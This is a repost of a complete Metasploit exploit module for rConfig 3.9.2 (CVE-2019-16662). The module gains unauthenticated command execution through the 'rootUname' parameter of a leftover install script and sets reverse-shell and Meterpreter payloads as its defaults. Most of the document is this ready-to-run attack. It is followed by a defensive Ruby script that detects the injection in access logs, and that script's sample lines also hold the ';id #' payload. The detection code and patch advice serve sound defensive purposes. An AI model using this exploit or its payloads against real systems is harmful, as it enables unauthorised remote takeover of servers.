rConfig - install Command Execution Exploit

#1
Code:
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
 Rank = ExcellentRanking

 include Msf::Exploit::Remote::HttpClient
 include Msf::Exploit::CmdStager

 def initialize(info = {})
   super(update_info(info,
     'Name'           => 'rConfig install Command Execution',
     'Description'    => %q{
       This module exploits an unauthenticated command injection vulnerability
       in rConfig versions 3.9.2 and prior. The `install` directory is not
       automatically removed after installation, allowing unauthenticated users
       to execute arbitrary commands via the `ajaxServerSettingsChk.php` file
       as the web server user.

       This module has been tested successfully on rConfig version 3.9.2 on
       CentOS 7.7.1908 (x64).
     },
     'License'        => MSF_LICENSE,
     'Author'         =>
       [
         'mhaskar', # Discovery and exploit
         'bcoles'   # Metasploit
       ],
     'References'     =>
       [
         ['CVE', '2019-16662'],
         ['EDB', '47555'],
         ['URL', 'https://gist.github.com/mhaskar/ceb65fa4ca57c3cdccc1edfe2390902e'],
         ['URL', 'https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/']
       ],
     'Platform'       => %w[unix linux],
     'Arch'           => [ARCH_CMD, ARCH_X86, ARCH_X64],
     'Payload'        => {'BadChars' => "\x00\x0a\x0d\x26"},
     'Targets'        =>
       [
         ['Automatic (Unix In-Memory)',
           'Platform'       => 'unix',
           'Arch'           => ARCH_CMD,
           'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse'},
           'Type'           => :unix_memory
         ],
         ['Automatic (Linux Dropper)',
           'Platform'       => 'linux',
           'Arch'           => [ARCH_X86, ARCH_X64],
           'DefaultOptions' => {'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'},
           'Type'           => :linux_dropper
         ]
       ],
     'Privileged'     => false,
     'DefaultOptions' => { 'SSL' => true, 'RPORT' => 443 },
     'DisclosureDate' => '2019-10-28',
     'DefaultTarget'  => 0))
   register_options(
     [
       OptString.new('TARGETURI', [true, 'The base path to rConfig install directory', '/install/'])
     ])
 end

 def check
   res = execute_command('id')

   unless res
     vprint_error 'Connection failed'
     return CheckCode::Unknown
   end

   if res.code == 404
     vprint_error 'Could not find install directory'
     return CheckCode::Safe
   end

   cmd_res = res.body.scan(%r{The root details provided have not passed: (.+?)<\\/}).flatten.first

   unless cmd_res
     return CheckCode::Safe
   end

   vprint_status "Response: #{cmd_res}"

   unless cmd_res.include?('uid=')
     return CheckCode::Detected
   end

   CheckCode::Vulnerable
 end

 def execute_command(cmd, opts = {})
   vprint_status "Executing command: #{cmd}"
   send_request_cgi({
     'uri' => normalize_uri(target_uri.path, '/lib/ajaxHandlers/ajaxServerSettingsChk.php'),
     'vars_get' => {'rootUname' => ";#{cmd} #"}
   }, 5)
 end

 def exploit
   unless [CheckCode::Detected, CheckCode::Vulnerable].include? check
     fail_with Failure::NotVulnerable, "#{peer} - Target is not vulnerable"
   end

   case target['Type']
   when :unix_memory
     execute_command(payload.encoded)
   when :linux_dropper
     execute_cmdstager(:linemax => 1_500)
   end
 end
end

#  0day.today [2019-11-10]  #
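
A defender's view of the request this module sends, as an added example that is not part of the original post or of Metasploit: a Ruby triage script that flags access-log hits on `ajaxServerSettingsChk.php` and marks those whose `rootUname` value carries shell metacharacters. The combined log format, the metacharacter set, the function names and the sample log lines are assumptions constructed for illustration.

```ruby
require 'uri'

# Handler path and parameter name come from the module above; the rest is assumed.
HANDLER    = %r{/lib/ajaxHandlers/ajaxServerSettingsChk\.php\z}i
SHELL_META = /[;|&`$()<>\r\n#]/ # characters that can break out of a shell command line
# Request portion of a combined-format access log line (assumed log format).
LOG_LINE = /\A(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>[A-Z]+) (?<target>\S+) [^"]*" (?<status>\d{3})/

# Constructed sample log (documentation IP ranges, not real traffic).
SAMPLE_LOG = <<~'LOG'
  198.51.100.7 - - [10/Nov/2019:10:01:02 +0000] "GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3Bid%20%23 HTTP/1.1" 200 96
  203.0.113.9 - - [10/Nov/2019:10:02:10 +0000] "GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=root HTTP/1.1" 200 80
  203.0.113.9 - - [10/Nov/2019:10:03:00 +0000] "GET /login.php HTTP/1.1" 200 512
  198.51.100.7 - - [10/Nov/2019:10:04:30 +0000] "GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3Bid+%23 HTTP/1.1" 404 0
LOG

# Percent-decode one URL component; undecodable input is kept so it is still inspected.
def decode(str)
  URI.decode_www_form_component(str).scrub
rescue ArgumentError
  str
end

# Returns nil for lines that do not touch the install handler, else a finding hash.
def classify(line)
  m = LOG_LINE.match(line.scrub) or return nil
  path, query = m[:target].split('?', 2)
  return nil unless HANDLER.match?(decode(path))

  # Pull the raw rootUname value out of the query string, if present.
  value = query.to_s.split('&').map { |kv| kv.split('=', 2) }
               .find { |k, _| decode(k.to_s) == 'rootUname' }&.last
  injected = SHELL_META.match?(decode(value.to_s))
  { ip: m[:ip], time: m[:time],
    reachable: m[:status] != '404', # install directory is still being served
    verdict: injected ? :injection_attempt : :handler_access }
end

# Classify every line of a log and keep only the findings.
def findings(log)
  log.each_line.map { |l| classify(l) }.compact
end

if $PROGRAM_NAME == __FILE__
  findings(SAMPLE_LOG).each { |f| puts f.inspect }
end
```

Any finding with `reachable: true` means the `install` directory is still being served after installation, which is the precondition the module description names; removing that directory closes this path regardless of the verdict.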